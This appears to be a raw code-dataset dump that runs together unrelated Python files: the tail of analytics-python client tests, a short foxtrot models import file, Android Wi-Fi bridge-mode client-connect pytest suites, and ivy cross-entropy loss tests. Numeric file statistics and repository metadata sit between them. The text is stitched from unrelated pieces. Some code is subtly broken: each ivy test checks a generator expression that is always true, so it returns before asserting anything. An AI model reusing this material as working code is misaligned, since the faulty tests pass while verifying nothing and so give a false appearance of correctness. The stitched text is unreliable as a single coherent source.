self.assertEqual(msg['anonymousId'], 'anonymousId')
self.assertEqual(msg['context']['library'], {
'name': 'analytics-python',
'version': VERSION
})
self.assertEqual(msg['category'], 'category')
self.assertTrue(isinstance(msg['timestamp'], str))
self.assertTrue(isinstance(msg['messageId'], str))
self.assertEqual(msg['userId'], 'userId')
self.assertEqual(msg['type'], 'page')
self.assertEqual(msg['name'], 'name')
def test_basic_screen(self):
client = self.client
success, msg = client.screen('userId', name='name')
client.flush()
self.assertTrue(success)
self.assertEqual(msg['userId'], 'userId')
self.assertEqual(msg['type'], 'screen')
self.assertEqual(msg['name'], 'name')
def test_advanced_screen(self):
client = self.client
success, msg = client.screen(
'userId', 'category', 'name', { 'property': 'value' },
{ 'ip': '192.168.0.1' }, datetime(2014, 9, 3), 'anonymousId',
{ 'Amplitude': True })
self.assertTrue(success)
self.assertEqual(msg['timestamp'], '2014-09-03T00:00:00+00:00')
self.assertEqual(msg['integrations'], { 'Amplitude': True })
self.assertEqual(msg['context']['ip'], '192.168.0.1')
self.assertEqual(msg['properties'], { 'property': 'value' })
self.assertEqual(msg['anonymousId'], 'anonymousId')
self.assertEqual(msg['context']['library'], {
'name': 'analytics-python',
'version': VERSION
})
self.assertTrue(isinstance(msg['timestamp'], str))
self.assertTrue(isinstance(msg['messageId'], str))
self.assertEqual(msg['category'], 'category')
self.assertEqual(msg['userId'], 'userId')
self.assertEqual(msg['type'], 'screen')
self.assertEqual(msg['name'], 'name')
def test_flush(self):
client = self.client
# set up the consumer with more requests than a single batch will allow
for i in range(1000):
success, msg = client.identify('userId', { 'trait': 'value' })
# We can't reliably assert that the queue is non-empty here; that's
# a race condition. We do our best to load it up though.
client.flush()
# Make sure that the client queue is empty after flushing
self.assertTrue(client.queue.empty())
def test_overflow(self):
client = Client('testsecret', max_queue_size=1)
# Ensure consumer thread is no longer uploading
client.join()
for i in range(10):
client.identify('userId')
success, msg = client.identify('userId')
# Make sure we are informed that the queue is at capacity
self.assertFalse(success)
def test_success_on_invalid_write_key(self):
client = Client('bad_key', on_error=self.fail)
client.track('userId', 'event')
client.flush()
self.assertFalse(self.failed)
def test_unicode(self):
Client(six.u('unicode_key'))
def test_numeric_user_id(self):
self.client.track(1234, 'python event')
self.client.flush()
self.assertFalse(self.failed)
def test_debug(self):
Client('bad_key', debug=True)
| 38.181452
| 79
| 0.597212
| 1,032
| 9,469
| 5.435078
| 0.141473
| 0.168479
| 0.202175
| 0.062578
| 0.778927
| 0.76823
| 0.760029
| 0.735425
| 0.710109
| 0.706008
| 0
| 0.029338
| 0.240469
| 9,469
| 247
| 80
| 38.336032
| 0.750556
| 0.039497
| 0
| 0.696517
| 0
| 0
| 0.19705
| 0.01376
| 0
| 0
| 0
| 0
| 0.482587
| 1
| 0.104478
| false
| 0
| 0.029851
| 0
| 0.139303
| 0
| 0
| 0
| 0
| null | 0
| 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6f4b982d14b19efac629e08a1e2f8f2d63570f48
| 145
|
py
|
Python
|
foxtrot/models/__init__.py
|
narfman0/foxtrot
|
ffcf9c4c0e01cda5ca65c4a3dd978a18cf762860
|
[
"MIT"
] | null | null | null |
foxtrot/models/__init__.py
|
narfman0/foxtrot
|
ffcf9c4c0e01cda5ca65c4a3dd978a18cf762860
|
[
"MIT"
] | 14
|
2018-08-16T20:37:13.000Z
|
2018-09-13T17:07:40.000Z
|
foxtrot/models/__init__.py
|
narfman0/foxtrot
|
ffcf9c4c0e01cda5ca65c4a3dd978a18cf762860
|
[
"MIT"
] | null | null | null |
from foxtrot.models.chunk import Chunk, Colony, Planet, RoomType, Ship
from foxtrot.models.npc import NPC
from foxtrot.models.world import World
| 36.25
| 70
| 0.82069
| 22
| 145
| 5.409091
| 0.5
| 0.277311
| 0.428571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.110345
| 145
| 3
| 71
| 48.333333
| 0.922481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
48a31c9dbaf340fb0bbb6c6c2f5fb5e04bf81953
| 24,647
|
py
|
Python
|
tests/e2e/interOp/validation_of_operating_modes/bridge_mode/client_connect_test/android/test_general_security_modes.py
|
dutta-rohan/wlan-testing
|
77264245b62e21dff5f38c7eae74c22e0cdeefbb
|
[
"BSD-3-Clause"
] | 7
|
2020-08-19T16:45:46.000Z
|
2022-02-10T09:55:22.000Z
|
tests/e2e/interOp/validation_of_operating_modes/bridge_mode/client_connect_test/android/test_general_security_modes.py
|
dutta-rohan/wlan-testing
|
77264245b62e21dff5f38c7eae74c22e0cdeefbb
|
[
"BSD-3-Clause"
] | 47
|
2020-12-20T16:06:03.000Z
|
2022-03-23T03:01:22.000Z
|
tests/e2e/interOp/validation_of_operating_modes/bridge_mode/client_connect_test/android/test_general_security_modes.py
|
dutta-rohan/wlan-testing
|
77264245b62e21dff5f38c7eae74c22e0cdeefbb
|
[
"BSD-3-Clause"
] | 9
|
2021-02-04T22:32:06.000Z
|
2021-12-14T17:45:51.000Z
|
from logging import exception
import unittest
import warnings
from perfecto.test import TestResultFactory
import pytest
import sys
import time
from selenium.common.exceptions import NoSuchElementException
from selenium.webdriver.common.by import By
from appium import webdriver
from selenium.common.exceptions import NoSuchElementException
import random
import string
import sys
import allure
if 'perfecto_libs' not in sys.path:
sys.path.append(f'../libs/perfecto_libs')
pytestmark = [pytest.mark.sanity, pytest.mark.interop, pytest.mark.android, pytest.mark.interop_and, pytest.mark.client_connect
,pytest.mark.interop_uc_sanity, pytest.mark.bridge]
from android_lib import closeApp, set_APconnMobileDevice_android, Toggle_AirplaneMode_android, ForgetWifiConnection, openApp, get_ip_address_and
setup_params_general = {
"mode": "BRIDGE",
"ssid_modes": {
"wpa": [{"ssid_name": "ssid_wpa_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa_5g", "appliedRadios": ["5G"],
"security_key": "something"}],
"open": [{"ssid_name": "ssid_open_2g", "appliedRadios": ["2G"]},
{"ssid_name": "ssid_open_5g", "appliedRadios": ["5G"]}],
"wpa2_personal": [
{"ssid_name": "ssid_wpa2_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa2_5g", "appliedRadios": ["5G"],
"security_key": "something"}]},
"rf": {},
"radius": False
}
for sec_modes in setup_params_general['ssid_modes'].keys():
for i in range(len(setup_params_general['ssid_modes'][sec_modes])):
N = 3
rand_string = (''.join(random.choices(string.ascii_uppercase +
string.digits, k=N)))+str(int(time.time_ns())%10000)
setup_params_general['ssid_modes'][sec_modes][i]['ssid_name'] = setup_params_general['ssid_modes'][sec_modes][i]['ssid_name'] + "_"+ rand_string
@allure.suite(suite_name="interop sanity")
@allure.sub_suite(sub_suite_name="Bridge Mode Client Connect : Suite-A")
@pytest.mark.InteropsuiteA
@allure.feature("BRIDGE MODE CLIENT CONNECT")
@pytest.mark.parametrize(
'setup_profiles',
[setup_params_general],
indirect=True,
scope="class"
)
@pytest.mark.usefixtures("setup_profiles")
class TestBridgeModeConnectSuiteOne(object):
""" Client Connect SuiteA
pytest -m "client_connect and bridge and InteropsuiteA"
"""
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4570", name="WIFI-4570")
@pytest.mark.fiveg
@pytest.mark.wpa2_personal
def test_ClientConnect_5g_WPA2_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4569", name="WIFI-4569")
@pytest.mark.twog
@pytest.mark.wpa2_personal
def test_ClientConnect_2g_WPA2_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["wpa2_personal"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4568", name="WIFI-4568")
@pytest.mark.fiveg
@pytest.mark.wpa
def test_ClientConnect_5g_WPA_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["wpa"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4567", name="WIFI-4567")
@pytest.mark.twog
@pytest.mark.wpa
def test_ClientConnect_2g_WPA_Personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["wpa"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4566", name="WIFI-4566")
@pytest.mark.fiveg
@pytest.mark.open
def test_ClientConnect_5g_Open_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["open"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = "[BLANK]"
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
#Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
#Toggle AirplaneMode
# assert Toggle_AirplaneMode_android(request, setup_perfectoMobile_android, connData)
#ForgetWifi
# ForgetWifiConnection(request, setup_perfectoMobile_android, ssidName, connData)
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4565", name="WIFI-4565")
@pytest.mark.twog
@pytest.mark.open
def test_ClientConnect_2g_Open_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general["ssid_modes"]["open"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = "[BLANK]"
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
setup_params_general_two = {
"mode": "BRIDGE",
"ssid_modes": {
"wpa3_personal": [
{"ssid_name": "ssid_wpa3_p_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa3_p_5g", "appliedRadios": ["5G"],
"security_key": "something"}],
"wpa3_personal_mixed": [
{"ssid_name": "ssid_wpa3_p_m_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa3_p_m_5g", "appliedRadios": ["5G"],
"security_key": "something"}],
"wpa_wpa2_personal_mixed": [
{"ssid_name": "ssid_wpa_wpa2_p_m_2g", "appliedRadios": ["2G"], "security_key": "something"},
{"ssid_name": "ssid_wpa_wpa2_p_m_5g", "appliedRadios": ["5G"],
"security_key": "something"}]
},
"rf": {},
"radius": False
}
for sec_modes in setup_params_general_two['ssid_modes'].keys():
for i in range(len(setup_params_general_two['ssid_modes'][sec_modes])):
N = 2
rand_string = (''.join(random.choices(string.ascii_uppercase +
string.digits, k=N)))+str(int(time.time_ns())%10000)
setup_params_general_two['ssid_modes'][sec_modes][i]['ssid_name'] = setup_params_general_two['ssid_modes'][sec_modes][i]['ssid_name'].replace("ssid_","") + "_"+ rand_string
@allure.suite(suite_name="interop sanity")
@allure.sub_suite(sub_suite_name="Bridge Mode Client Connect : Suite-B")
@pytest.mark.InteropsuiteB
@allure.feature("BRIDGE MODE CLIENT CONNECT")
@pytest.mark.parametrize(
'setup_profiles',
[setup_params_general_two],
indirect=True,
scope="class"
)
@pytest.mark.usefixtures("setup_profiles")
class TestBridgeModeConnectSuiteTwo(object):
""" Client Connect SuiteA
pytest -m "client_connect and bridge and InteropsuiteB"
"""
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4572", name="WIFI-4572")
@pytest.mark.fiveg
@pytest.mark.wpa3_personal
def test_ClientConnect_5g_wpa3_personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4571", name="WIFI-4571")
@pytest.mark.twog
@pytest.mark.wpa3_personal
def test_ClientConnect_2g_wpa3_personal_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4574", name="WIFI-4574")
@pytest.mark.fiveg
@pytest.mark.wpa3_personal_mixed
def test_ClientConnect_5g_wpa3_personal_mixed_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal_mixed"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4573", name="WIFI-4573")
@pytest.mark.twog
@pytest.mark.wpa3_personal_mixed
def test_ClientConnect_2g_wpa3_personal_mixed_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa3_personal_mixed"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4576", name="WIFI-4576")
@pytest.mark.fiveg
@pytest.mark.wpa_wpa2_personal_mixed
def test_ClientConnect_5g_wpa_wpa2_personal_mixed_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa_wpa2_personal_mixed"][1]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
#Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
@allure.testcase(url="https://telecominfraproject.atlassian.net/browse/WIFI-4575", name="WIFI-4575")
@pytest.mark.twog
@pytest.mark.wpa_wpa2_personal_mixed
def test_ClientConnect_2g_wpa_wpa2_personal_mixed_Bridge(self, request, get_vif_state, get_ap_logs,
get_ToggleAirplaneMode_data, setup_perfectoMobile_android):
profile_data = setup_params_general_two["ssid_modes"]["wpa_wpa2_personal_mixed"][0]
ssidName = profile_data["ssid_name"]
ssidPassword = profile_data["security_key"]
print ("SSID_NAME: " + ssidName)
print ("SSID_PASS: " + ssidPassword)
get_vif_state.append(ssidName)
if ssidName not in get_vif_state:
allure.attach(name="retest,vif state ssid not available:", body=str(get_vif_state))
pytest.xfail("SSID NOT AVAILABLE IN VIF STATE")
report = setup_perfectoMobile_android[1]
driver = setup_perfectoMobile_android[0]
connData = get_ToggleAirplaneMode_data
# Set Wifi/AP Mode
ip, is_internet = get_ip_address_and(request, ssidName, ssidPassword, setup_perfectoMobile_android, connData)
if ip:
if is_internet:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "with internet")
else:
text_body = ("connected to " + ssidName + " (" + ip + ") " + "without internet")
print(text_body)
allure.attach(name="Connection Status: ", body=str(text_body))
assert True
else:
allure.attach(name="Connection Status: ", body=str("Device is Unable to connect"))
assert False
| 45.223853
| 180
| 0.634073
| 2,777
| 24,647
| 5.3583
| 0.063738
| 0.03871
| 0.087366
| 0.030645
| 0.913508
| 0.906048
| 0.878562
| 0.860551
| 0.850202
| 0.827487
| 0
| 0.011773
| 0.255609
| 24,647
| 544
| 181
| 45.306985
| 0.799259
| 0.022356
| 0
| 0.787671
| 0
| 0
| 0.211879
| 0.003743
| 0
| 0
| 0
| 0
| 0.054795
| 1
| 0.027397
| false
| 0.082192
| 0.03653
| 0
| 0.068493
| 0.082192
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
5b09211906cd736bbcdc9d38138282a392f4e975
| 3,220
|
py
|
Python
|
ivy_tests/test_ivy/test_functional/test_nn/test_losses.py
|
VedPatwardhan/ivy
|
7b2105fa8cf38879444a1029bfaa7f0b2f27717a
|
[
"Apache-2.0"
] | 1
|
2022-02-13T19:35:02.000Z
|
2022-02-13T19:35:02.000Z
|
ivy_tests/test_ivy/test_functional/test_nn/test_losses.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
ivy_tests/test_ivy/test_functional/test_nn/test_losses.py
|
Arijit1000/ivy
|
de193946a580ca0f54d78fe7fc4031a6ff66d2bb
|
[
"Apache-2.0"
] | null | null | null |
# global
import numpy as np
from hypothesis import given, strategies as st
# local
import ivy
import ivy_tests.test_ivy.helpers as helpers
# cross_entropy
@given(
dtype_and_x=helpers.dtype_and_values(ivy.valid_float_dtypes, 2),
as_variable=helpers.list_of_length(st.booleans(), 2),
num_positional_args=helpers.num_positional_args(fn_name="cross_entropy"),
native_array=helpers.list_of_length(st.booleans(), 2),
container=helpers.list_of_length(st.booleans(), 2),
instance_method=st.booleans(),
)
def test_cross_entropy(
dtype_and_x,
as_variable,
num_positional_args,
native_array,
container,
instance_method,
fw,
):
input_dtype, x = dtype_and_x
if (v == [] for v in x):
return
if fw == "torch" and input_dtype == "float16":
return
helpers.test_array_function(
input_dtype,
as_variable,
False,
num_positional_args,
native_array,
container,
instance_method,
fw,
"cross_entropy",
true=np.asarray(x[0], dtype=input_dtype[0]),
pred=np.asarray(x[1], dtype=input_dtype[1]),
)
# binary_cross_entropy
@given(
dtype_and_x=helpers.dtype_and_values(ivy.valid_float_dtypes, 2),
as_variable=helpers.list_of_length(st.booleans(), 2),
num_positional_args=helpers.num_positional_args(fn_name="binary_cross_entropy"),
native_array=helpers.list_of_length(st.booleans(), 2),
container=helpers.list_of_length(st.booleans(), 2),
instance_method=st.booleans(),
)
def test_binary_cross_entropy(
dtype_and_x,
as_variable,
num_positional_args,
native_array,
container,
instance_method,
fw,
):
input_dtype, x = dtype_and_x
if (v == [] for v in x):
return
if fw == "torch" and input_dtype == "float16":
return
helpers.test_array_function(
input_dtype,
as_variable,
False,
num_positional_args,
native_array,
container,
instance_method,
fw,
"binary_cross_entropy",
true=np.asarray(x[0], dtype=input_dtype[0]),
pred=np.asarray(x[1], dtype=input_dtype[1]),
)
# sparse_cross_entropy
@given(
dtype_and_x=helpers.dtype_and_values(ivy.valid_float_dtypes, 2),
as_variable=helpers.list_of_length(st.booleans(), 2),
num_positional_args=helpers.num_positional_args(fn_name="sparse_cross_entropy"),
native_array=helpers.list_of_length(st.booleans(), 2),
container=helpers.list_of_length(st.booleans(), 2),
instance_method=st.booleans(),
)
def test_sparse_cross_entropy(
dtype_and_x,
as_variable,
num_positional_args,
native_array,
container,
instance_method,
fw,
):
input_dtype, x = dtype_and_x
if (v == [] for v in x):
return
if fw == "torch" and input_dtype == "float16":
return
helpers.test_array_function(
input_dtype,
as_variable,
False,
num_positional_args,
native_array,
container,
instance_method,
fw,
"sparse_cross_entropy",
true=np.asarray(x[0], dtype=input_dtype[0]),
pred=np.asarray(x[1], dtype=input_dtype[1]),
)
| 26.393443
| 84
| 0.661801
| 430
| 3,220
| 4.611628
| 0.137209
| 0.075643
| 0.102874
| 0.086233
| 0.919818
| 0.919818
| 0.919818
| 0.919818
| 0.919818
| 0.919818
| 0
| 0.012092
| 0.229503
| 3,220
| 121
| 85
| 26.61157
| 0.787183
| 0.021118
| 0
| 0.825688
| 0
| 0
| 0.045137
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.027523
| false
| 0
| 0.036697
| 0
| 0.119266
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
960c6141c0dee5b1de61ee32614e1a4a93c10b2f
| 9,754
|
py
|
Python
|
